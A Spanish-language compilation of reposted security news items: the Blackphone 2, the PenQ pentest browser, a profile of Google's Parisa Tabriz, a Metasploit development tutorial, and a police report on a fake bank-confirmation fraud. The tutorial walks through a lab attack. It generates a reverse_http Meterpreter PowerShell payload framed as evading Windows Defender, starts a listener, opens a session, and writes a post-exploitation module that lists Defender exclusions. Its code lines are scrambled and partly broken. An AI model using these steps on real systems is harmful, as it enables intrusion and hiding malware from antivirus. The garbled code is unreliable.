El dispositivo también soluciona el problema de la confianza con el Wi-Fi. Las redes públicas fuera de casa usualmente son inseguras. Bueno, pues el Blackphone 2 te permite que configures el teléfono de forma que el Wi-Fi se desactive en cuanto cruces la puerta, con lo que se evitará que tu teléfono se conecte accidentalmente a cualquier red Wi-Fi a lo largo del día.

También hay una función adicional que no se ve con frecuencia. Apple y Google tienen acceso secreto a los mensajes y las fotos de tu teléfono si usas los servicios en línea de iCloud o de Google. Sin embargo, Silent Circle afirma que nunca tiene acceso a tus datos, así que no puede dar nada a las corporaciones de seguridad.

De hecho, la empresa está decidida a impedir que los gobiernos rastreen a sus clientes. Por eso, el año pasado, Silent Circle trasladó sus oficinas de Estados Unidos a Suiza.

Hoy se sabe que el gobierno estadounidense convoca a las empresas estadounidenses regularmente a un tribunal federal secreto conocido como FISA y los obliga a entregar los datos de los clientes. El director de Silent Circle, Bill Conner, dijo a CNNMoney que no puede arriesgarse a que lo saquen del negocio con una sola orden judicial secreta.

"Nunca le daré al gobierno una entrada no oficial", dijo Conner.

Lo irónico es que la empresa señalara que las funciones de seguridad extrema del teléfono han llamado la atención de algunas unidades del FBI y de espías estadounidenses en el extranjero.

Pero ¿funciona en realidad? La empresa afirma que es la mejor opción que existe y algunos expertos en seguridad en la tecnología dicen que el Blackphone ciertamente es un avance. Pero solo el tiempo lo dirá.


FUENTE| cnnexpansion

PenQ es un navegador para Linux de código abierto creado para realizar test de penetración de aplicaciones web, construido sobre Mozilla Firefox. Viene configurado con herramientas de: búsquedas avanzada en Internet, fingerprinting, navegación anónima, escaneo de servidor web, fuzzing, generación de informes de resultados de test de penetración y muchos más. PenQ no es sólo una mezcla de complementos, viene configurado con algunas herramientas de código abierto muy poderosas programadas en Java y Python como:

·OWASP ZAP.
·OWASP WebScarab.
·OWASP WebSlayer.
·Escaner de servidores Web Nikto.
·Fuzzer de aplicaciones Web, Wfuzz.
·Con Tor integrado.
·Generador de informes de test de penetración.
·Base de datos con vulnerabilidades.
·Colección de Add-ons Mozilla: anonymoX, Awesome Screenshot, ChatZilla, CipherFox, Clear Console, Cookies Manager+, Cookie Monster, CryptoFox, Email Extractor, Firebug, FireFlow, FireFTP, FireSSH, Greasemonkey, Groundspeed, HackBar, HackSearch, Header Spy, HttpFox, HttpRequester, Java Deobfuscator, Library Detector, LinkSidebar, Proxy Selector, Proxy Tool, RefControl, RESTClient, Session Manager, SQL Inject Me, SQLite Manager, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, User Agent Switcher, Wappalyzer, Web Developer, Xinha Here! y XSS Me.



PenQ está configurado para ejecutarse en distribuciones basadas en Debian y sus distribuciones derivadas, incluyendo Ubuntu y los sistemas operativos de pruebas de penetración como: BackTrack y Kali. PenQ permite acceder a utilidades del sistema en ejecución y a las herramientas necesarias para ahorrar tiempo y hacer pruebas mucho más rápido. Posee herramientas integradas para la navegación anónima, supervisión del sistema, para tomar notas y programar tareas.

También proporciona manuales mediante enlaces a OWASP Testing Guide, una vasta fuente de conocimientos relacionados con las pruebas de seguridad.

Más información y descarga de PenQ:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Navegador Web con herramientas integradas para test de penetración en aplicaciones Web:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



FUENTE: gurudelainformatica

Ella sabe que es bella y talentosa. Conoce sus fortalezas y debilidades. Parisa Tabriz está más que consiente de su capacidad. Tiene origen iraní, experta hacker, al mando de uno de los equipos de seguridad más importantes de Google. Una treintena de hackers que se encargan de velar por la seguridad de Chrome, el navegador de Internet utilizado por más de mil millones de personas en todo el mundo. Ella se considera White hat (sombrero blanco). Elogiada por sus compañeros de trabajo, tanto que la han apodado "Security Princess". Tabriz es, sin duda, una de las hackers más letales detrás Google.



Su padre es un médico iraní que emigró a Estados Unidos y su madre una enfermera polaca. Formó parte del informe de Forbes como una de las 30 personas de todo el mundo menor de 30 años, cuya carrera había que seguir con atención.

En la Univesidad de Illinois estudió Ingeniería Informática. Cuenta que decidió convertirse en hacker cuando descubrió los trabajos de John Draper, uno de los primeros hackers de la red que consiguió hackear los teléfonos de la época para hacer llamadas internacionales gratuitas. Lo hacía regalando silbatos en las cajas de cereales Cap'n Cruch, el cual emitía un tono de 2600 Hz (la misma frecuencia de los teléfonos celulares), con esto era suficiente para llamar al extranjero de forma sin pagar un centavo.

Esta consumada hacker se dedica a atacar casi todos los días a Google, para comprobar su seguridad. También forma al equipo de hackers de la compañía, y realiza seminarios con jóvenes hackers, para atraerles "al lado luminoso".



Parisa Tabriz comenzó a formar parte de Google en el año 2007. Segura siempre de sí misma, es la niña mimada de Google.

Gracias a Parisa Tabriz y su equipo, mil millones de personas navegan seguras mientras visitan páginas web con el navegador Chrome.


FUENTE| telegraph

Vamos a cubrir el uso básico de Pry para escribir un modulo sencillo que enumerará las excepciones configuradas en Windows Defender en una maquina OS X o Linux. Aunque se puede desarrollar para Metasploit en una máquina que esté corriendo Windows no es recomendado debido a todas las limitantes que nos trae. Pry es un módulo de Ruby que se puede usar en vez de irb para tener una sesión interactiva dentro del contexto del framework para ejecutar comandos y pruebas. El mismo actúa como un prompt que podrí­amos tener en bash o en otra consola, lo cual lo hace familiar para el rápido aprendizaje del mismo.

Comencemos con preparar una estructura de carpetas similar a la estructura que usa Metasploit Framework para sus módulos y la inicializamos con git de manera de poder tener control de versión de la misma.

infidel01:~ carlos$ mkdir -p modulos/post/windows/gather

infidel01:~ carlos$ cd modulos/

Initialized empty Git repository in /Users/carlos/modulos/.git/


infidel01:modulos carlos$ git init

Una vez inicializado podermos crear el módulo que estaremos escribiendo y lo añadimos a la base de datos de control de git.

infidel01:modulos carlos$ touch post/windows/gather/get_windefender_exclusions.rb


infidel01:modulos carlos$ git add post/windows/gather/get_windefender_exclusions.rb

Abrimos en nuestro editor favorito el archivo que creamos y creamos lo que llamo el esqueleto de un modulo de post-exploitation en el cual incluimos el mixin de registry para Windows y de reporte.

Añadimos información general como la licencia, autor, que es para un sistema Windows y que el tipo de sesión es Meterpreter.

Los mixin serían:

* Msf::Post::Windows::Registry
* include Msf::Auxiliary::Report

El modulo se vería así

##


# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core/auxiliary/report'

##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Post

include Msf::Auxiliary::Report

include Msf::Post::Windows::Registry

  def initialize(info={})

'Name'          => 'Windows enumerate Windows Defender exclusions.',

super( update_info( info,
      'Description'   => %q{

'License'       => BSD_LICENSE,

Windows enumerate Windows Defender exclusions.
      },

'Author'        => [ 'Carlos Perez ' ],


'Platform'      => [ 'win' ],


'SessionTypes'  => [ 'meterpreter' ]

))
  end

  def run()

print_status("Running post module against #{sysinfo['Computer']}")

end

end

Generemos un payload en formato PowerShell de manera que evite la detección del mismo Windows Defender dandole como LHOST el IP de la máquina donde esta msfconsole corriendo:

msf > use payload/windows/meterpreter/reverse_http


msf payload(reverse_http) > set LHOST 192.168.100.2

LHOST => 192.168.100.2

msf payload(reverse_http) > generate -t psh-reflection -f /tmp/dev_payload.ps1

[*] Writing 2673 bytes to /tmp/dev_payload.ps1...

msf payload(reverse_http) > 

Ahora usando el Multi Handler creamos un trabajo que recibirá la sesión usando la información previa, ponemos ExitOnSession en falso de manera que siga escuchando por mas conexiones una vez establezca una e inicializamos el mismo como un job y en background.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http

PAYLOAD => windows/meterpreter/reverse_http

LHOST => 192.168.100.2

msf exploit(handler) > set LHOST 192.168.100.2

msf exploit(handler) > exploit -j -z

msf exploit(handler) > set ExitOnSession false
ExitOnSession => false

[*] Started HTTP reverse handler on http://0.0.0.0:8080/

[*] Exploit running as background job.


msf exploit(handler) > [*] Starting the payload handler...

En nuestra máquina Windows 8/8.1/10 abrimos Windows PowerShell x86 y copiamos el contenido del PS1 en la misma pantalla y lo ejecutamos, una sesión debe ser creada en msfconsole.

msf payload(reverse_http) > 


[*] 192.168.100.176:51786 (UUID: b0790294217a0a22/x86=1/windows=1/2015-09-22T18:32:23Z) Staging Native payload ...

[*] Meterpreter session 1 opened (192.168.100.1:8080 -> 192.168.100.176:51786) at 2015-09-22 14:32:24 -0400

Type: meterpreter x86/win32

msf payload(reverse_http) > sessions -v

Active sessions
===============

  Session ID: 1

Via: exploit/multi/handler

Info: WIN-RB3R8HILN3R\Carlos Perez @ WIN-RB3R8HILN3R
      Tunnel: 192.168.100.1:8080 -> 192.168.100.176:51786 (192.168.100.176)

CheckIn: 4s ago @ 2015-09-22 14:40:19 -0400

UUID: b0790294217a0a22/x86=1/windows=1/2015-09-22T18:32:23Z
   MachineID: 272520e89cdbf67b2d3f87c9696871cd
  Registered: No

Ahora podemos decirle a msfconsole que cargue el modulo que creamos del directorio de desarrollo.

msf payload(reverse_http) > loadpath ~/modulos

Loaded 1 modules:

1 post

Cargamos el modulo de manera de poder configurar el mismo con la sesión que creamos previamente y probamos que podemos ver su información.

msf exploit(handler) > use post/windows/gather/get_windefender_exclusions 

msf post(get_windefender_exclusions) > set SESSION 1
SESSION => 1

Name: Windows enumerate Windows Defender exclusions.

msf post(get_windefender_exclusions) > info

     Module: post/windows/gather/get_windefender_exclusions

Carlos Perez 

Platform: Windows
       Arch: 
       Rank: Normal

Provided by:




Basic options:


Name     Current Setting  Required  Description

----     ---------------  --------  -----------

SESSION  1                yes       The session to run this module on.

Description:

Windows enumerate Windows Defender exclusions.

Nuestro módulo ya está apuntando a una sesión y podemos comenzar a usar pry para explorar lo que tenemos disponible bajo su contexto dentro de Metasploit Framework. Esto lo conseguimos comenzando la terminal de pry dentro del mismo msfconsole entrando el commando:

msf post(get_windefender_exclusions) > pry


[1] pry(#)> 

El prompt será una largo por que tiene información del módulo donde estamos. Dependiendo del tamaño de pantalla que estemos usando, el mismo puede ser un tanto incómodo. Una manera para hacer el mismo má sencillo es usando el comando simple-prompt.

pry(#)> simple-prompt


>>

Para ver la ayuda de Pry entramos el comando de help, para paginar el mismo presionamos la tecla de espacio y para salir de la ayuda presionamos la tecla de Q.

>> help

Comenzaremos con ver el código fuente del modulo mismo usando el comando show-source:

>> show-source

Ahora miremos todas los métodos y funciones que podemos ejecutar bajo el contexto del modulo usando el comando de ls, podemos igual que antes paginar usando la tecla de espacio y salir presionando la tecla Q:

>> ls

como estaremos trabajando con el registry listemos solo los métodos relacionados con el mismo dándole el nombre del mixin de registry que importamos, el comando sería "ls Msf::Post::Windows::Registry"

>> ls Msf::Post::Windows::Registry


constants: REGISTRY_VIEW_32_BIT  REGISTRY_VIEW_64_BIT  REGISTRY_VIEW_NATIVE

Msf::Post::Windows::Registry#methods: 

registry_createkey  registry_deleteval  registry_enumvals    registry_getvalinfo  registry_setvaldata


registry_deletekey  registry_enumkeys   registry_getvaldata  registry_loadkey     registry_unloadkey 

Podemos identificar el método registry_enumkeys como el método que nos ayudaría a conseguir los keys debajo de otro, podemos ver el código del mismo y los valores que acepta usando el comando de show-source y dandole el nombre del método:

>> show-source registry_enumkeys


From: /usr/local/share/metasploit-framework/lib/msf/core/post/windows/registry.rb @ line 94:

Owner: Msf::Post::Windows::Registry
Visibility: public
Number of lines: 7


meterpreter_registry_enumkeys(key, view)

def registry_enumkeys(key, view = REGISTRY_VIEW_NATIVE)
  if session_has_registry_ext
  else

end

shell_registry_enumkeys(key, view)

end

Podemos ver que requiere una valor que seria la llave que vamos a enumerar y el otro es una constante ya dada que tiene que ver con si queremos ver solo el valor de la llave en contexto x64, x86 o la visión nativa del proceso bajo el cual estamos corriendo, en el caso que esté corriendo en una maquina X64 y la versión de Meterpreter que estamos usando es x86 necesitamos especificar que es el contexto de x64 el que queremos, si no el contexto nativo es suficiente. Para ver la información de la arquitectura del sistema podemos ver la variable sysinfo que se auto genera en una sesión meterpreter la cual incluye la información:

>> sysinfo


=> {"Computer"=>"WIN-RB3R8HILN3R",


"OS"=>"Windows 10 (Build 10240).",


"Architecture"=>"x64 (Current Process is WOW64)",

"System Language"=>"en_GB",

"Logged On Users"=>2}


"Domain"=>"WORKGROUP",

Probemos enumerando la llave que contiene la excepciones de Windows Defender que es HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions y ver que valores nos devuelve:

>> registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions", REGISTRY_VIEW_64_BIT)


=> ["Extensions", "Paths", "Processes", "TemporaryPaths"]

Podemos ver que nos devuelve un array con los nombres de las llaves. Podemos editar nuestro modulo desde dentro del mismo pry si deseamos. Guardemos el array que recibimos de tipos de exclusión en una variable de manera de poder entonces enumerar cada uno de ellos.

>> exclusion_key = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"

=> "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"

=> ["Extensions", "Paths", "Processes", "TemporaryPaths"]


>> exception_types = registry_enumkeys(exclusion_key,REGISTRY_VIEW_64_BIT)

Ahora podemos probar cata tipo de excepción y ver si tenemos alguna configurada.

>> exception_types.each do |et|


|   puts registry_enumvals("#{exclusion_key}\\#{et}",REGISTRY_VIEW_64_BIT)

| end
C:\Users\Carlos Perez\Desktop\test_code
\\192.168.1.2\media

=> ["Extensions", "Paths", "Processes", "TemporaryPaths"]

Podemos ver que podemos enumerar las que están configuradas de tipo path. Ahora que tenemos toda la información que necesitamos y que confirmamos podemos salir de pry escribiendo el comando de exit. Una vez fuera podemos escribir edit en msfconsole

>> exit


msf post(get_windefender_exclusions) > edit

Podemos ahora terminar de añadir toda la lógica necesaria para terminal el módulo.

##


# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core/auxiliary/report'

##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Post

include Msf::Auxiliary::Report

include Msf::Post::Windows::Registry

  def initialize(info={})

'Name'          => 'Windows enumerate Windows Defender exclusions.',

super( update_info( info,
      'Description'   => %q{

'License'       => BSD_LICENSE,

Windows enumerate Windows Defender exclusions.
      },

'Author'        => [ 'Carlos Perez ' ],


'Platform'      => [ 'win' ],


'SessionTypes'  => [ 'meterpreter' ]

))
  end

  def run()

print_status("Running post module against #{sysinfo['Computer']}")

print_status("Enumerating Windows Defender exceptions:")

if sysinfo['Architecture'] =~ /x64/

exclusion_key = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"

exception_types = registry_enumkeys(exclusion_key)

exception_types = registry_enumkeys(exclusion_key,REGISTRY_VIEW_64_BIT)
    else
    end
    exception_types.each do |et|

exclusions = registry_enumvals("#{exclusion_key}\\#{et}",REGISTRY_VIEW_64_BIT)

vprint_status("Checking for #{et} exceptions.")
      if sysinfo['Architecture'] =~ /x64/
      else
        exclusions = registry_enumvals("#{exclusion_key}\\#{et}")

vprint_status("No exclusions found for #{et}")

end

      if exclusions.length > 0
        print_status("Exceptions found for #{et}")
        exclusions.each do |exc|
          print_good("\t#{exc}")
        end
      else

end

end
    end


end

Una vez salimos del editor msfconsole vuelve a cargar el módulo y podemos ahora probar los cambios.

msf post(get_windefender_exclusions) > edit


[*] Launching /usr/bin/vim /Users/carlos/modulos/post/windows/gather/get_windefender_exclusions.rb

msf post(get_windefender_exclusions) > reload
[*] Reloading module...

[*] Enumerating Windows Defender exceptions:

msf post(get_windefender_exclusions) > run

[*] Running post module against WIN-RB3R8HILN3R

[*] Post module execution completed

[*] Exceptions found for Paths
[+]  C:\Users\Carlos Perez\Desktop\test_code
[+]  \\192.168.1.2\media

msf post(get_windefender_exclusions) >

En resumen, hemos visto como Pry nos puede ayudar a poder visualizar  mejor las llamadas del API, probar las mismas y a su vez reducir el tiempo cuando escribimos un módulo. Los mismos conceptos nos pueden servir cuando estamos tratando de resolver problemas con módulos existentes probando cada uno de sus componentes.



FUENTE| SBD

Los comercios enviaban los objetos sin percatarse del engaño hasta que el ingeniero hacía en el balance de cuentas. Luego cambiaba los productos por cocaína.

Agentes de la Policía Nacional han detenido a un ingeniero informático por estafar a varias empresas españolas mediante la compra fraudulenta de productos por internet imitando comunicaciones bancarias, ha informado la Jefatura Superior de Policía de Madrid. El detenido, de 30 años y nacionalidad italiana, había desarrollado un programa informático que le permitía suplantar la comunicación entre la entidad bancaria y el comercio confirmando el pago de los productos sin que realmente éste se hubiese producido.

Es decir, el detenido reemplazaba la confirmación del cobro que recibe la página web por parte del banco y que es lo que permite finalizar la operación de compra y que se proceda al envío de la mercancía. La mayoría de los comercios no se percataban del fraude hasta tiempo después cuando realizaban un balance de cuentas y comprobaban que el desembolso nunca se había producido. Por el momento la cuantía de lo defraudado asciende a un total de 11.849 euros y se le imputan al menos ocho delitos de estafa.

El detenido adquiría teléfonos móviles, equipos informáticos, televisores u otros productos electrónicos, artículos de farmacia o muebles, muchos de los cuales fueron hallados durante el registro practicado en su domicilio.

Los establecimientos comerciales al recibir la notificación de cobro por parte del banco no dudaban en realizar el envío con los objetos supuestamente adquiridos. Además, el hecho de remitir los productos acompañados de la factura original de compra generaba una apariencia de legalidad que favorecía su posterior venta a terceros, logrando el detenido con ello gran beneficio económico.

Intercambio de cocaína

La investigación iniciada a raíz de la denuncia interpuesta por una empresa con sede en Pamplona, llevó a los agentes a la localización del detenido en las inmediaciones de su domicilio en el distrito de Usera-Villaverde. En el registro llevado a cabo en su vivienda los agentes incautaron números objetos, la mayoría aparatos electrónicos de gran valor, que coincidían con los denunciados por los propietarios de los establecimientos que habían sido víctimas de esta estafa informática. El arrestado se encontraba realizando la mudanza de la vivienda que ocupaba ya que su intención era regresar a Italia al sospechar que podía estar siendo investigado por las autoridades españolas.

Como consecuencia de esta operación, los agentes descubrieron que el detenido también canjeaba muchos de estos objetos a cambio de cocaína, intercambio que siempre realizaba con la misma persona y en normalmente en el mismo lugar, un bar situado en el distrito Centro.

A raíz de estas informaciones, los agentes establecieron un dispositivo en donde se procedió a la detención de tres personas, un varón y dos mujeres, por un delito contra la salud públicA y un delito contra el patrimonio.

En el registro del domicilio de los tres detenidos se halló más de un kilogramo de cocaína, medio kilogramo de sustancia de corte y diversos útiles para la distribución de esta sustancia estupefaciente. Además, los agentes intervinieron un arma corta en perfecto estado de funcionamiento y ocho cartuchos.

La investigación, que continúa abierta y en la que no se descarta la aparición de más víctimas, ha sido llevada a cabo por agentes de la de la Comisaría de distrito de Usera- Villaverde, pertenecientes a la Jefatura Superior de Policía de Madrid.


FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

FUENTE: 20 minutos